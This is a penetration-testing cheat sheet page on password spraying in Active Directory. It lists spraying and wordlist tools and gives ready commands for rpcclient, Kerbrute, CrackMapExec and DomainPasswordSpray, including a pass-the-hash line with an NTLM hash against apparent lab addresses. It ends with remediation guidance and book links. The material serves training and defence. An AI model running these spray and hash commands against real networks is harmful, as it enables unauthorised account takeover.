Password Spray

Password Spraying Attacks - Tools

Start to identify valid users and check password policy

Custom Wordlist

LDAPWordListHarvester:

GitHub - TheManticoreProject/LDAPWordlistHarvester: A tool that allows you to extract a client-specific wordlist from the LDAP of an Active Directory.GitHub

pyLDAPWordlistHarvester:

GitHub - p0dalirius/pyLDAPWordlistHarvester: A tool to generate a wordlist from the information present in LDAP, in order to crack passwords of domain accounts.GitHub

GeoWordlists

GitHub - p0dalirius/GeoWordlists: GeoWordlists is a tool to generate wordlists of passwords containing cities at a defined distance around the client city.GitHub

RPCclient

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

CME

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

crackmapexec smb 172.16.5.5 -u valid_users.txt -p Welcome1 --continue-on-success

cme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success

Local admin

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

SprayHound

GitHub - Hackndo/sprayhound at 5e0e5b757ab1ab8f832eddea2fad883f2773bc6eGitHub

CaptainCredz

GitHub - synacktiv/captaincredz: CaptainCredz is a modular and discreet password-spraying tool.GitHub

Conpass- Continuous password spraying tool

GitHub - login-securite/conpass: Continuous password spraying toolGitHub

Powershell - DomainPasswordSpray.ps1

PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

Spray - Usernames

Spray/name-lists/statistically-likely-usernames at master · Greenwolf/SprayGitHub

Remediation

The following security controls should be implemented to mitigate password spraying:

Create passwords for local administrator accounts, service accounts, and break glass accounts that are long (30-character minimum), unique, unpredictable and managed. Microsoft’s Local Administrator Password Solution (LAPS) can be used to achieve this for local administrator accounts. Using strong passwords reduces the likelihood of successful password spraying.
Create passwords used for single-factor authentication that consist of at least four random words with a total minimum length of 15-characters to reduce the likelihood of a successful password spraying.
Lock out user objects, except for break glass accounts, after a maximum of five failed logon attempts. Enforcing an account lock threshold after five failed authentication attempts reduces the number of possible attempts in password spraying.
Ensure passwords created for user objects are randomly generated, such as when a user object is created, or a user requests a password reset. Malicious actors will try to identify reused passwords and use these in password spraying to increase the likelihood of success.
Configure the built-in ‘Administrator’ domain account as sensitive to ensure it cannot be delegated.
Scan networks at least monthly to identify any credentials that are being stored in the clear. Malicious actors scan networks for cleartext credentials to use in password spraying. Locating and removing these cleartext credentials proactively mitigates this risk.
Disable the NTLM protocol. The NTLM protocol does not support MFA and can be misused by malicious actors to bypass MFA requirements.

Detecting and mitigating Active Directory compromises | Cyber.gov.auwww.cyber.gov.au

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Pentesting Active Directory and Windows-based Infrastructure Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
Infrastructure Attack Strategies for Ethical Hacking Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
RTFM: Red Team Field Manual v2 A quick reference when there is no time to scour the Internet for that perfect command
Red Team Development and Operations: A practical guide The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
Cybersecurity Attacks – Red Team Strategies A practical guide to building a penetration testing program having homefield advantage

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousPassword Policy NextLDAP Pass Back Attack

Last updated 7 months ago

hashtagCustom Wordlist

hashtagRPCclient

hashtagKerbrute

hashtagCME

hashtagLocal admin

hashtagSprayHound

hashtagCaptainCredz

hashtagConpass- Continuous password spraying tool

hashtagPowershell - DomainPasswordSpray.ps1

hashtagSpray - Usernames

hashtagRemediation

hashtagInteresting Book

hashtagSupport this Gitbook